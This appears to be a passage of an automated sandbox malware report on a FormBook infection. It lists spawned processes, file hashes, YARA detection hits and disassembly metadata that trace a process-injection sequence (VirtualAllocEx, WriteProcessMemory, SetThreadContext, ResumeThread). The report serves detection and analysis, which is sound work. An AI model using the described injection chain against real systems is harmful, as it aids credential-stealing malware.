                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\op55336.scr"
                                                                                            Imagebase:0xdd0000
                                                                                            File size:636'928 bytes
                                                                                            MD5 hash:3CCB984FD28AFEA83F2F2E8A6ED4CCFA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.411272581.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.412838071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.416629798.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:7
                                                                                            Start time:08:26:28
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe"
                                                                                            Imagebase:0x1f0000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.847416646.0000000003360000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:08:26:30
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Windows\SysWOW64\dfrgui.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\dfrgui.exe"
                                                                                            Imagebase:0x9e0000
                                                                                            File size:586'752 bytes
                                                                                            MD5 hash:FB036244DBD2FADC225AD8650886B641
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.847226726.00000000003A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.847107222.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.847192255.00000000002E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            Reputation:low
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:08:26:33
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                            Imagebase:0x400000
                                                                                            File size:543'304 bytes
                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:08:26:45
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\pOpZAxuInwNywgBapnAWdZXbrTDlLElAsOFsyrXJueIMOOrWoPVgtmphhzHkGklYLVasaggHvswqLTp\eDTvjJMLUGCaWhgZ.exe"
                                                                                            Imagebase:0x1f0000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.847699564.0000000004DB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            General

                                                                                            Target ID:14
                                                                                            Start time:08:27:04
                                                                                            Start date:02/05/2024
                                                                                            Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                                            Imagebase:0x12c0000
                                                                                            File size:517'064 bytes
                                                                                            MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.479625649.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Non-executed Functions

                                                                                              Function 00679718 Relevance: 4.4, Strings: 3, Instructions: 664COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.349581619.000000000066F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0066F000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_66f000_EQNEDT32.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: *yT$*yT$t
                                                                                              • API String ID: 0-1495078640
                                                                                              • Opcode ID: 3af9d9933c86a906b7d87e7a270e2ca88e31827f8417bd59d9698723503cbb81
                                                                                              • Instruction ID: 7b99f38d68a741b2c7732a4d30e34167904e846ae16359b642982531e0b3ce12
                                                                                              • Opcode Fuzzy Hash: 3af9d9933c86a906b7d87e7a270e2ca88e31827f8417bd59d9698723503cbb81
                                                                                              • Instruction Fuzzy Hash: B342ED6240E3C19FC7178B344C795907FB1AE23218B1E46DBC8D5CF9E3E219991AC766
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Execution Graph

                                                                                              Execution Coverage:20.1%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:44
                                                                                              Total number of Limit Nodes:1
                                                                                              execution_graph 2785 154870 2786 1548fd CreateProcessW 2785->2786 2788 154a56 2786->2788 2789 153c80 2790 153c9a 2789->2790 2791 153cea 2790->2791 2793 153d30 2790->2793 2794 153d73 2793->2794 2813 153a70 2794->2813 2817 153a6c 2794->2817 2795 154241 2821 153918 2795->2821 2825 153910 2795->2825 2796 154520 2807 153910 WriteProcessMemory 2796->2807 2808 153918 WriteProcessMemory 2796->2808 2797 154325 2797->2796 2805 153910 WriteProcessMemory 2797->2805 2806 153918 WriteProcessMemory 2797->2806 2798 15455e 2799 154646 2798->2799 2829 1537e9 2798->2829 2833 1537f0 2798->2833 2837 153b90 2799->2837 2841 153b88 2799->2841 2800 154703 2800->2790 2805->2797 2806->2797 2807->2798 2808->2798 2814 153ab4 VirtualAllocEx 2813->2814 2816 153b2c 2814->2816 2816->2795 2818 153a70 VirtualAllocEx 2817->2818 2820 153b2c 2818->2820 2820->2795 2822 153964 WriteProcessMemory 2821->2822 2824 1539fd 2822->2824 2824->2797 2826 153918 WriteProcessMemory 2825->2826 2828 1539fd 2826->2828 2828->2797 2830 1537f0 Wow64SetThreadContext 2829->2830 2832 1538b1 2830->2832 2832->2799 2834 153839 Wow64SetThreadContext 2833->2834 2836 1538b1 2834->2836 2836->2799 2838 153bd4 ResumeThread 2837->2838 2840 153c20 2838->2840 2840->2800 2842 153b90 ResumeThread 2841->2842 2844 153c20 2842->2844 2844->2800 2845 154ca0 ReadProcessMemory 2846 154d5f 2845->2846

                                                                                              Executed Functions

                                                                                              Function 00154868 Relevance: 1.7, APIs: 1, Instructions: 224processCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 194 154868-1548fb 196 154912-154920 194->196 197 1548fd-15490f 194->197 198 154937-154973 196->198 199 154922-154934 196->199 197->196 200 154975-154984 198->200 201 154987-154a54 CreateProcessW 198->201 199->198 200->201 205 154a56-154a5c 201->205 206 154a5d-154b1c 201->206 205->206 216 154b52-154b5d 206->216 217 154b1e-154b47 206->217 221 154b5e 216->221 217->216 221->221
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00154A41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: e030bc36cbf3a65ce91d52f87f96e908443cb248edce31ce26b6976d0e15e3af
                                                                                              • Instruction ID: 6add4b0379eec317d0c7a66f8f7260f20ce7a602720fdc1ba3ab7b744db344ac
                                                                                              • Opcode Fuzzy Hash: e030bc36cbf3a65ce91d52f87f96e908443cb248edce31ce26b6976d0e15e3af
                                                                                              • Instruction Fuzzy Hash: E081E174D00219CFDF25CFA5C844BDEBBB5BB09304F1491AAE519B7210DB709A89CF64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00154870 Relevance: 1.7, APIs: 1, Instructions: 220processCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 222 154870-1548fb 223 154912-154920 222->223 224 1548fd-15490f 222->224 225 154937-154973 223->225 226 154922-154934 223->226 224->223 227 154975-154984 225->227 228 154987-154a54 CreateProcessW 225->228 226->225 227->228 232 154a56-154a5c 228->232 233 154a5d-154b1c 228->233 232->233 243 154b52-154b5d 233->243 244 154b1e-154b47 233->244 248 154b5e 243->248 244->243 248->248
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00154A41
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 9bc00d7250c19185249a71cf51c8b34560cfc358541174e930aa9682a36f6035
                                                                                              • Instruction ID: d2065041ad47544a4c057f46886ec0ba5336145949e06eaae175ea5f19f681a0
                                                                                              • Opcode Fuzzy Hash: 9bc00d7250c19185249a71cf51c8b34560cfc358541174e930aa9682a36f6035
                                                                                              • Instruction Fuzzy Hash: DD81E174D00229CFDF25CFA5C884BDEBBB5BB09304F1491AAE519B7210DB709A89CF64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00153910 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 249 153910-153983 252 153985-153997 249->252 253 15399a-1539fb WriteProcessMemory 249->253 252->253 255 153a04-153a56 253->255 256 1539fd-153a03 253->256 256->255
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001539EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: f9508b93f68515f1cda94fe2a66f6ff6c3cda8ecc2860f3331ed402fa434508e
                                                                                              • Instruction ID: 98d1dc777f9bbf8cb5598d7ea71a4732d15fa743f3fe174e858fc6fea57193ba
                                                                                              • Opcode Fuzzy Hash: f9508b93f68515f1cda94fe2a66f6ff6c3cda8ecc2860f3331ed402fa434508e
                                                                                              • Instruction Fuzzy Hash: 9641ACB4D01248DFCF00CFA9D984ADEFBF1BB49314F24942AE824BB210D375AA45CB54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00153918 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 261 153918-153983 263 153985-153997 261->263 264 15399a-1539fb WriteProcessMemory 261->264 263->264 266 153a04-153a56 264->266 267 1539fd-153a03 264->267 267->266
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001539EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: 603bcfa33d4450b1530b2f3aa8de6bc37de203cc972b8f43844307937e047329
                                                                                              • Instruction ID: cd63152d5b2a4b22275f20a2f935f10bfff0d780c47098e8f7a659daef258e57
                                                                                              • Opcode Fuzzy Hash: 603bcfa33d4450b1530b2f3aa8de6bc37de203cc972b8f43844307937e047329
                                                                                              • Instruction Fuzzy Hash: 86419BB5D01258DFCB00CFA9D984ADEFBF1BB49314F24942AE814BB210D375AA45CB64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00153A6C Relevance: 1.6, APIs: 1, Instructions: 104memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 272 153a6c-153b2a VirtualAllocEx 276 153b33-153b7d 272->276 277 153b2c-153b32 272->277 277->276
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00153B1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 2aeea6a0e5254be10b8696fbf5e7486e7742f535e34c4f0882ea87bd30ee0db7
                                                                                              • Instruction ID: 1c95102203e49e43cd035a9ae3a80ce13579dee7ec8bb126778228286f0acf38
                                                                                              • Opcode Fuzzy Hash: 2aeea6a0e5254be10b8696fbf5e7486e7742f535e34c4f0882ea87bd30ee0db7
                                                                                              • Instruction Fuzzy Hash: 3731ABB4D00258DFCF10CFA9D984ADEFBB1BB49310F20942AE814BB210D735AA45CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00154C9C Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 282 154c9c-154d5d ReadProcessMemory 284 154d66-154da4 282->284 285 154d5f-154d65 282->285 285->284
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00154D4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: 787a83b51c4b4d03f44c50e9c05a129218412ef359e2bba3a128428edb703f57
                                                                                              • Instruction ID: 5887b93f35b8bea1835010a7e870af62dbbb6d18f4aa3ee0ee1a59da6e5b738f
                                                                                              • Opcode Fuzzy Hash: 787a83b51c4b4d03f44c50e9c05a129218412ef359e2bba3a128428edb703f57
                                                                                              • Instruction Fuzzy Hash: 193179B9D00258DFCF10CFAAD884ADEFBB1BB59314F20902AE814B7210D375AA45CF64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00153A70 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 288 153a70-153b2a VirtualAllocEx 291 153b33-153b7d 288->291 292 153b2c-153b32 288->292 292->291
                                                                                              APIs
                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00153B1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: fecc867fb741f4abd0bf50b486cc1970161b0e0f4c193b8ae7c856f4efac6e30
                                                                                              • Instruction ID: 80afbd6a3030bd673045ea1d47e28f6fb9d0680d26c1920aa13d0904e4b038de
                                                                                              • Opcode Fuzzy Hash: fecc867fb741f4abd0bf50b486cc1970161b0e0f4c193b8ae7c856f4efac6e30
                                                                                              • Instruction Fuzzy Hash: F13189B8D00258DFCF10CFA9D984ADEFBB1BB49350F20942AE825BB210D735AA45CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00154CA0 Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 297 154ca0-154d5d ReadProcessMemory 298 154d66-154da4 297->298 299 154d5f-154d65 297->299 299->298
                                                                                              APIs
                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00154D4D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessRead
                                                                                              • String ID:
                                                                                              • API String ID: 1726664587-0
                                                                                              • Opcode ID: 0c00a9c75ed086afe62705d79e8c5f0e4f4b81aa4a80b0a3e28825d0eeac4d99
                                                                                              • Instruction ID: 3d924771e375c0164ed18dad8864e834aa417c40f5b737413cab8cc920b593e0
                                                                                              • Opcode Fuzzy Hash: 0c00a9c75ed086afe62705d79e8c5f0e4f4b81aa4a80b0a3e28825d0eeac4d99
                                                                                              • Instruction Fuzzy Hash: 1E318AB9D00258DFCF10CFAAD884ADEFBB1BB59310F10902AE814B7210D375AA45CF64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 001537E9 Relevance: 1.6, APIs: 1, Instructions: 95threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 302 1537e9-153850 305 153867-1538af Wow64SetThreadContext 302->305 306 153852-153864 302->306 308 1538b1-1538b7 305->308 309 1538b8-153904 305->309 306->305 308->309
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0015389F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: c7c15ac04dfc9044f1340fefc1bff0fa2c45e6843ef05200b0bc9bbd498971a0
                                                                                              • Instruction ID: dd59b0dd3e20bca5bacb59c904b9b6a7145ffd679d20cf4fcfe8f72fffa1648e
                                                                                              • Opcode Fuzzy Hash: c7c15ac04dfc9044f1340fefc1bff0fa2c45e6843ef05200b0bc9bbd498971a0
                                                                                              • Instruction Fuzzy Hash: 1C41B0B4D01258DFDB14CFA9D884AEEBBF1BB89354F24842AE814B7250C7786A49CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 001537F0 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 314 1537f0-153850 316 153867-1538af Wow64SetThreadContext 314->316 317 153852-153864 314->317 319 1538b1-1538b7 316->319 320 1538b8-153904 316->320 317->316 319->320
                                                                                              APIs
                                                                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0015389F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextThreadWow64
                                                                                              • String ID:
                                                                                              • API String ID: 983334009-0
                                                                                              • Opcode ID: 95ea898f5a4fd9ead71337bd85540dcc56960d82086f43a11ab0166f61f87105
                                                                                              • Instruction ID: 8d7f78f166774abf29b6fab96de8012957e3d81ae251d95017e239c0c94bfde3
                                                                                              • Opcode Fuzzy Hash: 95ea898f5a4fd9ead71337bd85540dcc56960d82086f43a11ab0166f61f87105
                                                                                              • Instruction Fuzzy Hash: 6531BDB4D00258DFDB14CFA9D884AEEBBF1BB49354F24842AE814B7240C778AA49CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00153B88 Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 325 153b88-153c1e ResumeThread 329 153c27-153c69 325->329 330 153c20-153c26 325->330 330->329
                                                                                              APIs
                                                                                              • ResumeThread.KERNELBASE(?), ref: 00153C0E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: b3dd75e472c45d40843d57ad7ea3d6cd9a32f01f0dbafd1928b200169c99400a
                                                                                              • Instruction ID: 71254cbca40e6d56783362b890e398c4cb053fafb4b64f3699cf0bea90cf3083
                                                                                              • Opcode Fuzzy Hash: b3dd75e472c45d40843d57ad7ea3d6cd9a32f01f0dbafd1928b200169c99400a
                                                                                              • Instruction Fuzzy Hash: 7431BCB4D00219DFDF10CFA9D984ADEFBB4AB49350F20942AE824B7250D775A945CF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00153B90 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ResumeThread.KERNELBASE(?), ref: 00153C0E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351459783.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_150000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID: ResumeThread
                                                                                              • String ID:
                                                                                              • API String ID: 947044025-0
                                                                                              • Opcode ID: 743be6606df287034e10cc815a44d4e34f1bb4f45f713386cb49a93d6645ef0b
                                                                                              • Instruction ID: c67d6dc917431435122df5d2df9edf78e80788ca774db3bb6e81b44cf67869d2
                                                                                              • Opcode Fuzzy Hash: 743be6606df287034e10cc815a44d4e34f1bb4f45f713386cb49a93d6645ef0b
                                                                                              • Instruction Fuzzy Hash: 8F31CCB4D00218DFCB10CFA9D984AEEFBB4AF89350F20942AE824B7310C734AA45CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 000BD4CC Relevance: .1, Instructions: 75COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351370168.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_bd000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 23ae6f679befdde768aac3d75a85e9b169886b535f84219024b8aa8e141589a3
                                                                                              • Instruction ID: 40ef1b3d8c1d240dc357a3d3fccb97e20acdf531f4e81441ccb7f1bb4e122dd3
                                                                                              • Opcode Fuzzy Hash: 23ae6f679befdde768aac3d75a85e9b169886b535f84219024b8aa8e141589a3
                                                                                              • Instruction Fuzzy Hash: 81210371504240DFEB25DF10D8C4BAAFFA5FB94328F34C56AD8050B246D336D956CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 000BD4C7 Relevance: .1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.351370168.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_bd000_op55336.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7c2a7613c0a56ce3c9cbe3d081ed45b9d684030b97154731165a9db01cb31c8c
                                                                                              • Instruction ID: 2af4d3ec581eb2a8c52ed98e223279d88d19e6a5529bada3780a4ab498db61b1
                                                                                              • Opcode Fuzzy Hash: 7c2a7613c0a56ce3c9cbe3d081ed45b9d684030b97154731165a9db01cb31c8c
